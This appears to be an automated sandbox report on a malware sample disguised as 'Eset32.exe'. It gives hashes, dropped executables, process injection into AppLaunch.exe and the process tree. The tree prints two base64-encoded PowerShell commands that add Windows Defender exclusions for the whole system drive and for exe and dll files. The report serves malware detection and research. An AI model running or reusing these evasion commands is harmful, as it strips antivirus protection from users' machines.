5b35297b640271fea6e846f28d07852589f60ab88ee597c0e2eea68a5de3bec9

General

Target

Eset32.exe
Size

3.9MB
MD5

b405bf6533c047b1a47ceced3b42c23b
SHA1

bbb321d380c3f9d17e49a9f2167234742e292e4d
SHA256

5b35297b640271fea6e846f28d07852589f60ab88ee597c0e2eea68a5de3bec9
SHA512

662af21fa3c267ca3a7b451d1a969e1b2dc4fd197368a066e7273b51673bf6def91b02b4d5e429c3b6947a5c97ceb17703b0e716eb6e6dc5a146ca2af40a4c82

Score

8^/10

Malware Config

Signatures

Executes dropped EXE 2 IoCs

Processes:

12.exe1.exe

pid process

1664 12.exe
1712 1.exe
Loads dropped DLL 3 IoCs

Processes:

Eset32.exe

pid process

752 Eset32.exe
752 Eset32.exe
752 Eset32.exe

pid	process
1664	12.exe
1712	1.exe

pid	process
752	Eset32.exe
752	Eset32.exe
752	Eset32.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

1.exe

description pid process target process

PID 1712 set thread context of 1940 1712 1.exe AppLaunch.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

1472 powershell.exe
1228 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1472 powershell.exe
Token: SeDebugPrivilege 1228 powershell.exe

description	pid	process	target process
PID 1712 set thread context of 1940	1712	1.exe	AppLaunch.exe

pid	process
1472	powershell.exe
1228	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1472	powershell.exe
Token: SeDebugPrivilege	1228	powershell.exe

Suspicious use of WriteProcessMemory 26 IoCs

Processes:

Eset32.exe1.exe12.execmd.exe

description	pid	process	target process
PID 752 wrote to memory of 1664	752	Eset32.exe	12.exe
PID 752 wrote to memory of 1664	752	Eset32.exe	12.exe
PID 752 wrote to memory of 1664	752	Eset32.exe	12.exe
PID 752 wrote to memory of 1664	752	Eset32.exe	12.exe
PID 752 wrote to memory of 1712	752	Eset32.exe	1.exe
PID 752 wrote to memory of 1712	752	Eset32.exe	1.exe
PID 752 wrote to memory of 1712	752	Eset32.exe	1.exe
PID 752 wrote to memory of 1712	752	Eset32.exe	1.exe
PID 1712 wrote to memory of 1940	1712	1.exe	AppLaunch.exe
PID 1712 wrote to memory of 1940	1712	1.exe	AppLaunch.exe
PID 1712 wrote to memory of 1940	1712	1.exe	AppLaunch.exe
PID 1712 wrote to memory of 1940	1712	1.exe	AppLaunch.exe
PID 1712 wrote to memory of 1940	1712	1.exe	AppLaunch.exe
PID 1712 wrote to memory of 1940	1712	1.exe	AppLaunch.exe
PID 1712 wrote to memory of 1940	1712	1.exe	AppLaunch.exe
PID 1712 wrote to memory of 1940	1712	1.exe	AppLaunch.exe
PID 1712 wrote to memory of 1940	1712	1.exe	AppLaunch.exe
PID 1664 wrote to memory of 684	1664	12.exe	cmd.exe
PID 1664 wrote to memory of 684	1664	12.exe	cmd.exe
PID 1664 wrote to memory of 684	1664	12.exe	cmd.exe
PID 684 wrote to memory of 1472	684	cmd.exe	powershell.exe
PID 684 wrote to memory of 1472	684	cmd.exe	powershell.exe
PID 684 wrote to memory of 1472	684	cmd.exe	powershell.exe
PID 684 wrote to memory of 1228	684	cmd.exe	powershell.exe
PID 684 wrote to memory of 1228	684	cmd.exe	powershell.exe
PID 684 wrote to memory of 1228	684	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\Eset32.exe
"C:\Users\Admin\AppData\Local\Temp\Eset32.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:752

C:\Users\Admin\AppData\Roaming\12.exe
C:\Users\Admin\AppData\Roaming\12.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1664

C:\Windows\system32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:684

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1472

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1228

C:\Users\Admin\AppData\Roaming\1.exe
C:\Users\Admin\AppData\Roaming\1.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1712

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:1940

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\1.exe
MD5
d9f92868eee8d3c8ecd29a7969419d29

SHA1
0a74749dfcd4eca403859431ebb18ba2a7e845bf

SHA256
b7154023e4778ac19ee6885bf403bf20ce675ef4b87f816e379fa98293526be3

SHA512
5f29374b1bc47f8a978d03476bd8727dcb42b0d6ad028a6decdbbf41363c70001ea017888b5e8a44326d86d2f2fdfe39ade6c27861b7aa317f2f09a62bae95f7

Download Submit
C:\Users\Admin\AppData\Roaming\12.exe
MD5
7add9a3ab1734828f756f2725c452c9a

SHA1
8ede7005b99e59af98da451fba6afce13f3a5629

SHA256
dab7fda27d80d645d5a709e59dd1afe41a535885bc353c844077e570d051e763

SHA512
cd8582431009ba4b192d73e6e0494318d73e02993c9981c16f7481b30395f8db9cdaf11b6d0d00ac487be511cffd5479fa70bcf5bb713cfaa7edf7e8e87663f9

Download Submit
C:\Users\Admin\AppData\Roaming\12.exe
MD5
7add9a3ab1734828f756f2725c452c9a

SHA1
8ede7005b99e59af98da451fba6afce13f3a5629

SHA256
dab7fda27d80d645d5a709e59dd1afe41a535885bc353c844077e570d051e763

SHA512
cd8582431009ba4b192d73e6e0494318d73e02993c9981c16f7481b30395f8db9cdaf11b6d0d00ac487be511cffd5479fa70bcf5bb713cfaa7edf7e8e87663f9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
298bc5a31cbb21cbed7eb6128d3e1ef3

SHA1
f3689e12c786ba7369e4b6179936f165395c0e34

SHA256
4e4fcb85fc687d7d40d6cfb28c6243b593f72aa56cf260319c2b0dc97fffbce4

SHA512
cd7db2e223a5a4ef1abec5f4582595321551e10c55634a3b0233dcfd2ee30875dae83eadc1110384142f54e6cbff9f65beab9c972190143409b653c6ea59ef9b

Download Submit
\Users\Admin\AppData\Roaming\1.exe
MD5
d9f92868eee8d3c8ecd29a7969419d29

SHA1
0a74749dfcd4eca403859431ebb18ba2a7e845bf

SHA256
b7154023e4778ac19ee6885bf403bf20ce675ef4b87f816e379fa98293526be3

SHA512
5f29374b1bc47f8a978d03476bd8727dcb42b0d6ad028a6decdbbf41363c70001ea017888b5e8a44326d86d2f2fdfe39ade6c27861b7aa317f2f09a62bae95f7

Download Submit
\Users\Admin\AppData\Roaming\1.exe
MD5
d9f92868eee8d3c8ecd29a7969419d29

SHA1
0a74749dfcd4eca403859431ebb18ba2a7e845bf

SHA256
b7154023e4778ac19ee6885bf403bf20ce675ef4b87f816e379fa98293526be3

SHA512
5f29374b1bc47f8a978d03476bd8727dcb42b0d6ad028a6decdbbf41363c70001ea017888b5e8a44326d86d2f2fdfe39ade6c27861b7aa317f2f09a62bae95f7

Download Submit
\Users\Admin\AppData\Roaming\12.exe
MD5
7add9a3ab1734828f756f2725c452c9a

SHA1
8ede7005b99e59af98da451fba6afce13f3a5629

SHA256
dab7fda27d80d645d5a709e59dd1afe41a535885bc353c844077e570d051e763

SHA512
cd8582431009ba4b192d73e6e0494318d73e02993c9981c16f7481b30395f8db9cdaf11b6d0d00ac487be511cffd5479fa70bcf5bb713cfaa7edf7e8e87663f9

Download Submit
memory/684-78-0x0000000000000000-mapping.dmp

Download
memory/752-54-0x0000000076AE1000-0x0000000076AE3000-memory.dmp

Filesize
8KB

Download
memory/1228-91-0x0000000002760000-0x0000000002762000-memory.dmp

Filesize
8KB

Download
memory/1228-94-0x000000000276B000-0x000000000278A000-memory.dmp

Filesize
124KB

Download
memory/1228-92-0x0000000002762000-0x0000000002764000-memory.dmp

Filesize
8KB

Download
memory/1228-93-0x0000000002764000-0x0000000002767000-memory.dmp

Filesize
12KB

Download
memory/1228-90-0x000007FEEBC90000-0x000007FEEC7ED000-memory.dmp

Filesize
11.4MB

Download
memory/1228-87-0x0000000000000000-mapping.dmp

Download
memory/1472-81-0x000007FEEC630000-0x000007FEED18D000-memory.dmp

Filesize
11.4MB

Download
memory/1472-83-0x0000000002722000-0x0000000002724000-memory.dmp

Filesize
8KB

Download
memory/1472-86-0x000000000272B000-0x000000000274A000-memory.dmp

Filesize
124KB

Download
memory/1472-85-0x000000001B700000-0x000000001B9FF000-memory.dmp

Filesize
3.0MB

Download
memory/1472-79-0x0000000000000000-mapping.dmp

Download
memory/1472-80-0x000007FEFC511000-0x000007FEFC513000-memory.dmp

Filesize
8KB

Download
memory/1472-82-0x0000000002720000-0x0000000002722000-memory.dmp

Filesize
8KB

Download
memory/1472-84-0x0000000002724000-0x0000000002727000-memory.dmp

Filesize
12KB

Download
memory/1664-76-0x000000001CEA0000-0x000000001D098000-memory.dmp

Filesize
2.0MB

Download
memory/1664-75-0x000000013F770000-0x000000013F980000-memory.dmp

Filesize
2.1MB

Download
memory/1664-77-0x000000001AD60000-0x000000001AD62000-memory.dmp

Filesize
8KB

Download
memory/1664-56-0x0000000000000000-mapping.dmp

Download
memory/1712-63-0x0000000000102000-0x0000000000104000-memory.dmp

Filesize
8KB

Download
memory/1712-61-0x0000000000000000-mapping.dmp

Download
memory/1940-72-0x0000000000090000-0x0000000000122000-memory.dmp

Filesize
584KB

Download
memory/1940-64-0x0000000000090000-0x0000000000122000-memory.dmp

Filesize
584KB

Download
memory/1940-66-0x0000000000090000-0x0000000000122000-memory.dmp

Filesize
584KB

Download
memory/1940-71-0x000000000011DA8E-mapping.dmp

Download
memory/1940-73-0x0000000000090000-0x0000000000122000-memory.dmp

Filesize
584KB

Download

Analysis

Sharing